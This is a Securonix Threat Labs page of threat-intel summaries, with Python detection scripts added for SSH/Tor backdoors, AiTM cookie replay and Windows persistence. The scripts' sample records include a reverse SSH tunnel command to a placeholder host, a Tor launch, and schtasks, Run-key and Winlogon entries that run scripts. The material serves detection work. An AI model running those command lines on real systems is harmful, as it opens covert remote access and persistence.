Securonix Threat Labs

Get up-to-date threat content from the experts at Securonix Threat Labs.

Uncover the threats of tomorrow, today.

Securonix Threat Labs helps your team fend off rising threats by bringing the industry’s brightest minds together to equip you with the latest countermeasures and best practices.

Powered by Threat Labs

Autonomous Threat Sweeper

Acting as your own dedicated Cyber Rapid Response Team, Securonix Autonomous Threat Sweeper (ATS) automatically and retroactively hunts for new and emerging threats based on the latest threat intelligence from our Threat Labs Team.

Latest ATS Entries

All indicators of compromise (IOC) and Spotter queries are available on our GitHub repository.

2025-11-08
Windows_SSH_backdoor
MEDIUM
Intel Source:
Twitter
Intel Name:
Windows_SSH_backdoor
Date of Scan:
2025-11-08
Impact:
MEDIUM
Summary:
PRODAFT researchers have identified that the FIN7 threat group, also known as Savage Ladybug, is actively deploying a Windows-based SSH backdoor to maintain persistent access and exfiltrate data from enterprise systems. The campaign bundles legitimate OpenSSH components with a batch script that automates deployment and establishes covert communication channels between compromised hosts and attacker-controlled servers. Because the tooling is standard OpenSSH, FIN7 establishes encrypted reverse SSH and SFTP connections that blend with legitimate administrative traffic, making detection difficult. The backdoor provides persistent remote access, lateral movement, and data theft while leaving minimal forensic traces in security logs.
Source: https://x.com/PRODAFT/status/1985731361492050255
2025-11-07
Beast_Ransomware_Hidden_in_GUI
LOW
Intel Source:
ASEC researchers
Intel Name:
Beast_Ransomware_Hidden_in_GUI
Date of Scan:
2025-11-07
Impact:
LOW
Summary:
Researchers at AhnLab Security Intelligence Center (ASEC) analyzed a newly emerging ransomware group called Beast, which evolved from the Monster ransomware family. The Beast group began operating as a Ransomware-as-a-Service (RaaS) in February 2025 and launched their Tor-based leak site (“Beast Leaks”) in July 2025. As of August 2025, they had publicly named 16 victims across North America, Europe, Asia, and Latin America, targeting multiple sectors such as manufacturing, construction, healthcare, education, and business services. Beast ransomware stands out for its technical sophistication, interactive GUI interface, and advanced anti-recovery mechanisms, making decryption nearly impossible without the attackers’ key.
Source: https://asec.ahnlab.com/en/90792/
2025-11-07
Rhadamanthys_Malware
LOW
Intel Source:
ASEC researchers
Intel Name:
Rhadamanthys_Malware
Date of Scan:
2025-11-07
Impact:
LOW
Summary:
Researchers at AhnLab Security Intelligence Center (ASEC) identified a new distribution method for the Rhadamanthys infostealer, a well-known malware family that steals credentials, cryptocurrency wallets, browser data, and system information. In this campaign, threat actors disguise Rhadamanthys as a legitimate visual novel game built on Ren’Py, a Python-based open-source game engine used by indie developers and available on platforms like Steam. The attackers embed the malware into the game’s script files so that when users run what appears to be a harmless game executable, the malicious loader activates and installs Rhadamanthys in the background. This campaign leverages social engineering and gaming communities (especially free game forums and file-sharing sites like MediaFire) to infect unsuspecting users.
Source: https://asec.ahnlab.com/en/90767/
2025-11-07
Kimsuky_JavaScript_Dropper_Analysis
HIGH
Intel Source:
Pulsedive
Intel Name:
Kimsuky_JavaScript_Dropper_Analysis
Date of Scan:
2025-11-07
Impact:
HIGH
Summary:
Researchers at Pulsedive Threat Research have identified a new Kimsuky intrusion chain leveraging a JavaScript-based dropper to establish persistence and exfiltrate system information from Windows hosts. The investigation revealed that the dropper executes multiple stages, beginning with a lightweight JavaScript file responsible for retrieving and executing additional payloads from adversary infrastructure. The subsequent stage performs host reconnaissance by collecting system configuration details, running processes, and directory listings, which are then compressed and transmitted to the attacker’s command server. The malware further modifies Windows registry keys and creates scheduled tasks to maintain continuous execution, ensuring the dropper remains active even after reboot.
Source: https://blog.pulsedive.com/dissecting-the-infection-chain-technical-analysis-of-the-kimsuky-javascript-dropper/
2025-11-06
ActiveMQ_Vulnerability_Exploitation_to_Install_Sharpire
LOW
Intel Source:
AhnLab Security Intelligence Center
Intel Name:
ActiveMQ_Vulnerability_Exploitation_to_Install_Sharpire
Date of Scan:
2025-11-06
Impact:
LOW
Summary:
Researchers at ASEC discovered that the Kinsing (also known as H2Miner) threat actor is exploiting the Apache ActiveMQ vulnerability (CVE-2023-46604) to infect both Linux and Windows systems. The attackers use this flaw to remotely install several malware families, including XMRig (cryptominer), Sharpire (.NET backdoor), Cobalt Strike, and Meterpreter for system control and post-exploitation. This marks a shift in Kinsing’s activity, from simple cryptocurrency mining to full system compromise and remote control, making it a more serious and versatile threat.
Source: https://asec.ahnlab.com/en/90811/
2025-11-06
Tycoon_2FA_Bypasses_MFA_via_AiTM_Phishing_Kit
HIGH
Intel Source:
Cybereason
Intel Name:
Tycoon_2FA_Bypasses_MFA_via_AiTM_Phishing_Kit
Date of Scan:
2025-11-06
Impact:
HIGH
Summary:
Researchers at Cybereason have analyzed Tycoon 2FA, a sophisticated Phishing-as-a-Service (PhaaS) kit active since August 2023 that uses a reverse-proxy Adversary-in-the-Middle (AiTM) technique to bypass MFA/2FA on Microsoft 365 and Google (Gmail) accounts by intercepting credentials and session cookies in real time, yielding full account compromise. The kit delivers phishing links via PDFs, PowerPoint, SVG files, and malicious websites often hosted on cloud platforms (Amazon S3, Dropbox, Canva), and performs domain, CAPTCHA, debugger, and bot checks before redirection to evade automated analysis. Its multi-stage JavaScript chain employs base64, XOR, and AES-encrypted code with CryptoJS-driven dynamic decryption, heavy obfuscation, and memory-only execution. It gathers user-agent and geolocation data, encrypts the data with hardcoded AES keys, and transmits it via AJAX POSTs to attacker-controlled C2 endpoints. The AiTM proxy relays credentials to the legitimate servers while dynamically rendering authentic error messages and MFA prompts, making the phishing flow nearly indistinguishable from a real login, and the kit’s adaptive design tailors attacks to the victim’s authentication policies.
Source: https://www.cybereason.com/blog/tycoon-phishing-kit-analysis
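The observable an AiTM proxy leaves behind is a session whose MFA-satisfied sign-in arrives from the proxy host while the captured cookie is later presented from somewhere else. The following detection sketch is an added example written for this page; it is not Cybereason's or Securonix's content. The field names, the trusted-network allowlist and the sample sign-in records are constructed assumptions and do not mirror any particular identity provider's log schema.

```python
"""Added example: flag a session cookie that is presented from a different
source network than the sign-in that minted it, the trace left behind when an
AiTM reverse proxy completes the MFA handshake and the operator then replays
the captured cookie from another host.

All field names and records below are constructed for this example."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sign-in telemetry. S1 models an AiTM capture: the MFA-satisfied
# sign-in comes from a hosting provider (the phishing proxy) and the cookie is
# then used from a second network. S2 is an ordinary user session.
EVENTS = [
    {"ts": "2025-11-06T09:00:00", "user": "alice@example.com", "event": "signin",
     "session": "S1", "ip": "203.0.113.10", "asn": "ExampleHosting", "mfa": True},
    {"ts": "2025-11-06T09:01:30", "user": "alice@example.com", "event": "token_use",
     "session": "S1", "ip": "198.51.100.77", "asn": "OtherISP", "mfa": None},
    {"ts": "2025-11-06T09:05:00", "user": "bob@example.com", "event": "signin",
     "session": "S2", "ip": "192.0.2.5", "asn": "CorpISP", "mfa": True},
    {"ts": "2025-11-06T09:30:00", "user": "bob@example.com", "event": "token_use",
     "session": "S2", "ip": "192.0.2.5", "asn": "CorpISP", "mfa": None},
]

# Hypothetical allowlist of networks this organisation's users sign in from.
TRUSTED_ASNS = {"CorpISP"}


def _ts(event):
    return datetime.fromisoformat(event["ts"])


def find_session_hijacks(events, window=timedelta(hours=8)):
    """Return one alert per session whose cookie is used, within `window` of
    the originating sign-in, from an IP or ASN that differs from that sign-in."""
    by_session = defaultdict(list)
    for e in events:
        by_session[e["session"]].append(e)

    alerts = []
    for sid, evs in by_session.items():
        evs.sort(key=_ts)
        signins = [e for e in evs if e["event"] == "signin"]
        if not signins:
            continue  # cookie with no observed mint is out of scope here
        origin = signins[0]
        for use in evs:
            if use["event"] != "token_use":
                continue
            delta = _ts(use) - _ts(origin)
            if delta < timedelta(0) or delta > window:
                continue
            if use["ip"] != origin["ip"] or use["asn"] != origin["asn"]:
                alerts.append({
                    "session": sid,
                    "user": origin["user"],
                    "signin_ip": origin["ip"],
                    "signin_asn": origin["asn"],
                    "use_ip": use["ip"],
                    "use_asn": use["asn"],
                    "mfa_at_signin": bool(origin["mfa"]),
                    "signin_from_untrusted_asn": origin["asn"] not in TRUSTED_ASNS,
                })
                break  # one alert per session is enough for triage
    return alerts


if __name__ == "__main__":
    for alert in find_session_hijacks(EVENTS):
        print(alert)
```

Caveat: if the operator replays the cookie through the same proxy host that performed the sign-in, the IP and ASN will not change and this rule stays silent. That is why the alert also records whether the MFA-satisfied sign-in came from outside the trusted networks; in practice the two signals are combined with device and user-agent changes rather than used alone.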
2025-11-06
SleepyDuck_VSX_Ethereum_Based_C2_Malware
HIGH
Intel Source:
Cyberwarzone
Intel Name:
SleepyDuck_VSX_Ethereum_Based_C2_Malware
Date of Scan:
2025-11-06
Impact:
HIGH
Summary:
Researchers at Secure Annex have identified a malicious Visual Studio Extension (VSX) known as SleepyDuck that employs the Ethereum blockchain for command-and-control (C2) operations. Distributed through the Open VSX registry under the guise of a legitimate Solidity development tool, the extension was modified in early November 2025 to include remote access trojan capabilities. Once installed, SleepyDuck connects to Ethereum smart contracts to dynamically update its C2 configuration, making takedown and detection significantly more difficult. The malware periodically polls for new commands, exfiltrates host and user information, and maintains fallback mechanisms using multiple Ethereum Remote Procedure Call (RPC) endpoints to ensure persistence.
Source: https://cyberwarzone.com/2025/11/04/malicious-vsx-extension-sleepyduck-leverages-ethereum-for-command-and-control/
2025-11-05
SSH_Tor_Backdoor_Target_Defence_Sector
MEDIUM
Intel Source:
Cyble
Intel Name:
SSH_Tor_Backdoor_Target_Defence_Sector
Date of Scan:
2025-11-05
Impact:
MEDIUM
Summary:
Researchers at Cyble have identified a phishing campaign that deploys an SSH-over-Tor backdoor via military-themed lures and weaponized archives. The attack chain is initiated by a malicious .LNK shortcut that executes PowerShell, performs environment checks, stages additional payloads, and then presents benign-appearing decoy documents to minimize detection. Following installation, the implant establishes persistence through a scheduled task and installs OpenSSH alongside Tor components to conceal C2 infrastructure within Tor hidden services. Operators then expose multiple services—SSH, RDP, SMB and SFTP—over those hidden services, enabling full remote administration, credential harvesting, data staging and exfiltration, and lateral movement across the compromised environment.
Source: https://cyble.com/blog/weaponized-military-documents-deliver-backdoor/
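The Windows_SSH_backdoor and SSH_Tor_Backdoor_Target_Defence_Sector entries above both abuse legitimate OpenSSH binaries, dropped outside the normal install location and driven by scripts, to stand up reverse tunnels; the second adds Tor. The following rules over process-creation telemetry are an added example written for this page, not indicators published by PRODAFT, Cyble or Securonix. The install-directory list, flag heuristics, parent-process expectation and the sample records are this example's own assumptions.

```python
"""Added example: screen Windows process-creation records (Sysmon Event 1
style fields) for the OpenSSH / Tor abuse patterns described in the two SSH
backdoor entries: ssh.exe started as a standing reverse tunnel, OpenSSH
binaries outside the standard install directories, sshd.exe not started by
the service control manager, and tor.exe / torrc usage.

Rules and sample records are constructed for this example."""
import re

# Where Windows ships or installs OpenSSH; anything else merits a look.
STANDARD_SSH_DIRS = (
    "c:\\windows\\system32\\openssh\\",
    "c:\\program files\\openssh\\",
)
OPENSSH_BINARIES = ("ssh.exe", "sshd.exe", "sftp.exe", "sftp-server.exe", "ssh-agent.exe")

# Constructed records, not events from a real host.
RECORDS = [
    {"Image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "CommandLine": "ssh.exe admin@jump.corp.example",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"Image": r"C:\ProgramData\OpenSSH\ssh.exe",
     "CommandLine": r"ssh.exe -N -f -R 2222:127.0.0.1:22 -i C:\ProgramData\OpenSSH\id_rsa "
                    r"-o StrictHostKeyChecking=no svc@203.0.113.50",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\ProgramData\OpenSSH\sshd.exe",
     "CommandLine": r"sshd.exe -f C:\ProgramData\OpenSSH\sshd_config",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Users\Public\tor\tor.exe",
     "CommandLine": r"tor.exe -f C:\Users\Public\tor\torrc",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\OpenSSH\sshd.exe",
     "CommandLine": "sshd.exe",
     "ParentImage": r"C:\Windows\System32\services.exe"},
]


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def _dirname(path):
    return path.rsplit("\\", 1)[0].lower() + "\\"


def rule_reverse_tunnel(rec):
    if _basename(rec["Image"]) != "ssh.exe":
        return None
    # -R requests a remote port forward; -N (no remote command) together with
    # -f (background) is the shape of a standing tunnel, not an interactive login.
    flags = set(re.findall(r"(?:^|\s)-([RNfW])(?=\s|$)", rec["CommandLine"]))
    if "R" in flags or {"N", "f"} <= flags:
        return "ssh_reverse_tunnel"
    return None


def rule_nonstandard_openssh_path(rec):
    if (_basename(rec["Image"]) in OPENSSH_BINARIES
            and not _dirname(rec["Image"]).startswith(STANDARD_SSH_DIRS)):
        return "openssh_outside_install_dir"
    return None


def rule_sshd_not_service_child(rec):
    # A legitimate sshd is started by services.exe; a batch script or shell
    # launching it points at a manual, attacker-driven deployment.
    if _basename(rec["Image"]) == "sshd.exe" and _basename(rec["ParentImage"]) != "services.exe":
        return "sshd_not_started_by_scm"
    return None


def rule_tor(rec):
    if (_basename(rec["Image"]) == "tor.exe"
            or re.search(r"torrc|HiddenServiceDir|HiddenServicePort", rec["CommandLine"])):
        return "tor_process"
    return None


RULES = (rule_reverse_tunnel, rule_nonstandard_openssh_path,
         rule_sshd_not_service_child, rule_tor)


def scan(records):
    """Return (rule_name, image, command_line) for every rule that fires."""
    hits = []
    for rec in records:
        for rule in RULES:
            name = rule(rec)
            if name:
                hits.append((name, rec["Image"], rec["CommandLine"]))
    return hits


if __name__ == "__main__":
    for hit in scan(RECORDS):
        print(hit)
```

The two legitimate records (an interactive ssh.exe from the system path and sshd.exe started by services.exe) produce no hits; the staged copies under ProgramData fire on path and on parentage, and the reverse tunnel fires on its flags regardless of where the binary sits. Environments that deploy OpenSSH elsewhere by design should extend STANDARD_SSH_DIRS rather than drop the path rule.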
2025-11-05
Phishing_Campaign_Targets_NPM_Developers
HIGH
Intel Source:
Group-IB
Intel Name:
Phishing_Campaign_Targets_NPM_Developers
Date of Scan:
2025-11-05
Impact:
HIGH
Summary:
Group-IB researchers uncovered a phishing-based supply chain attack targeting the NPM ecosystem. The campaign began when threat actors compromised a developer’s NPM account by luring them to a fraudulent NPM login portal disguised as a legitimate 2FA update notification. Once the attacker gained full access, they modified around 20 widely used NPM packages to inject a malicious JavaScript-based crypto-clipper. The malware covertly monitored browser and application activity to detect cryptocurrency transactions and replaced legitimate wallet addresses with those controlled by the attackers, impacting multiple cryptocurrencies including Bitcoin, Ethereum, Solana, Tron, Litecoin, and Bitcoin Cash. The phishing emails impersonated official NPM Support communications, evading SPF, DKIM, and DMARC checks while leveraging urgency to prompt user action. The compromised packages collectively received about 2.8 billion weekly downloads, underscoring the significant potential impact.
Source: https://www.group-ib.com/blog/detect-npm-supply-chain-attack/
2025-11-05
MuddyWater_Phoenix_v4_Espionage_Campaign
HIGH
Intel Source:
Polyswarm
Intel Name:
MuddyWater_Phoenix_v4_Espionage_Campaign
Date of Scan:
2025-11-05
Impact:
HIGH
Summary:
Researchers at PolySwarm have identified a new cyber-espionage campaign attributed to the Iran-linked APT MuddyWater, which is actively targeting government entities across the Middle East and North Africa. The operation employs phishing emails sent from compromised accounts accessed via NordVPN, delivering macro-enabled Word documents that execute a FakeUpdate injector to deploy the Phoenix backdoor version 4. Once executed, the malware establishes persistence through Winlogon registry modifications and enables remote access for data exfiltration and command execution. Analysis indicates that the attackers leverage Chromium-based credential stealers and remote monitoring tools such as PDQ and Action1, hosted on the same infrastructure, to maintain access and facilitate post-exploitation activities. Overlaps in macro code, C2 infrastructure, and tool usage link this operation to historical MuddyWater campaigns tied to Iran’s Ministry of Intelligence and Security (MOIS).
Source: https://blog.polyswarm.io/muddywater-targets-mena-governments-with-phoenix-backdoor
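The Kimsuky_JavaScript_Dropper_Analysis and MuddyWater_Phoenix_v4_Espionage_Campaign entries above describe persistence through registry modification (Winlogon in MuddyWater's case) and scheduled tasks. The following checks over Sysmon-style registry and process records are an added example written for this page, not detection content from Pulsedive, PolySwarm or Securonix. The key names, expected default values, script-host and user-writable-path patterns, and the sample records are this example's own assumptions; the cited writeups do not publish these rules.

```python
"""Added example: screen Sysmon-style registry (Event 13) and process
(Event 1) records for autostart persistence: Winlogon Shell/Userinit values
changed away from their defaults, Run/RunOnce values that point at a script
host or a user-writable directory, and schtasks /create whose action does
the same.

Key names, defaults, regexes and sample records are constructed here."""
import re

WINLOGON = "\\software\\microsoft\\windows nt\\currentversion\\winlogon\\"
RUN_KEYS = ("\\currentversion\\run\\", "\\currentversion\\runonce\\")

# Expected Winlogon values on a stock install (compared case-insensitively).
WINLOGON_DEFAULTS = {
    "userinit": {"c:\\windows\\system32\\userinit.exe,", "c:\\windows\\system32\\userinit.exe"},
    "shell": {"explorer.exe"},
}

SCRIPT_HOST = re.compile(
    r"\b(?:wscript|cscript|mshta|powershell|pwsh|rundll32|regsvr32)\.exe\b"
    r"|\.(?:js|jse|vbs|vbe|hta|ps1)\b", re.IGNORECASE)
USER_WRITABLE = re.compile(r"\\(?:appdata|programdata|temp|users\\public)\\", re.IGNORECASE)

# Constructed records, not events from a real host.
RECORDS = [
    {"EventID": 13,
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",
     "Details": r"C:\Windows\system32\userinit.exe,C:\ProgramData\svc\upd.exe"},
    {"EventID": 13,
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",
     "Details": r"C:\Windows\system32\userinit.exe,"},
    {"EventID": 13,
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": r'wscript.exe //B "C:\Users\v\AppData\Roaming\upd.js"'},
    {"EventID": 13,
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\VendorTray",
     "Details": r'"C:\Program Files\Vendor\tray.exe"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks /create /sc minute /mo 10 /tn "SysUpdate" /tr "wscript.exe //B C:\Users\Public\sync.js" /f'},
    {"EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks /create /sc daily /tn "Backup" /tr "C:\Program Files\Vendor\backup.exe"'},
]


def _suspicious_action(text):
    """True when an autostart action uses a script host or lives in a
    user-writable location."""
    return bool(SCRIPT_HOST.search(text) or USER_WRITABLE.search(text))


def check_registry(rec):
    key = rec["TargetObject"].lower()
    data = rec["Details"].strip().lower()
    if WINLOGON in key:
        value_name = key.rsplit("\\", 1)[-1]
        expected = WINLOGON_DEFAULTS.get(value_name)
        # Any deviation from the default (for example an appended second
        # executable) means something else now runs at logon.
        if expected is not None and data not in expected:
            return "winlogon_autostart_tampered"
    elif any(k in key for k in RUN_KEYS) and _suspicious_action(rec["Details"]):
        return "run_key_scripthost_or_user_path"
    return None


def check_process(rec):
    image = rec["Image"].rsplit("\\", 1)[-1].lower()
    cmdline = rec["CommandLine"]
    if image == "schtasks.exe" and re.search(r"(?i)/create\b", cmdline):
        action = re.search(r'(?i)/tr\s+("[^"]*"|\S+)', cmdline)
        if action and _suspicious_action(action.group(1)):
            return "schtasks_scripthost_or_user_path"
    return None


def scan(records):
    """Return (rule_name, key_or_commandline) for every record that fires."""
    hits = []
    for rec in records:
        if rec["EventID"] == 13:
            name = check_registry(rec)
        elif rec["EventID"] == 1:
            name = check_process(rec)
        else:
            name = None
        if name:
            hits.append((name, rec.get("TargetObject") or rec.get("CommandLine")))
    return hits


if __name__ == "__main__":
    for hit in scan(RECORDS):
        print(hit)
```

The Winlogon check compares against a fixed default rather than pattern-matching the value, because a tampered Userinit typically keeps the genuine userinit.exe and appends the implant after the comma; a substring search for the legitimate binary would miss it. The Run-key and schtasks checks are heuristic and will need tuning against whatever login scripts and vendor updaters an environment legitimately runs from user-writable paths.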

Threat Content

Shared Security Content on Sigma

Securonix Threat Labs publishes up-to-date IOCs and threat hunting queries on Sigma, allowing you to tap into a vast community of collective defense and stay ahead of emerging threat research.

Why Security Content Matters

Learn how Securonix is paving the way to make precise and actionable security content a reality for our customers.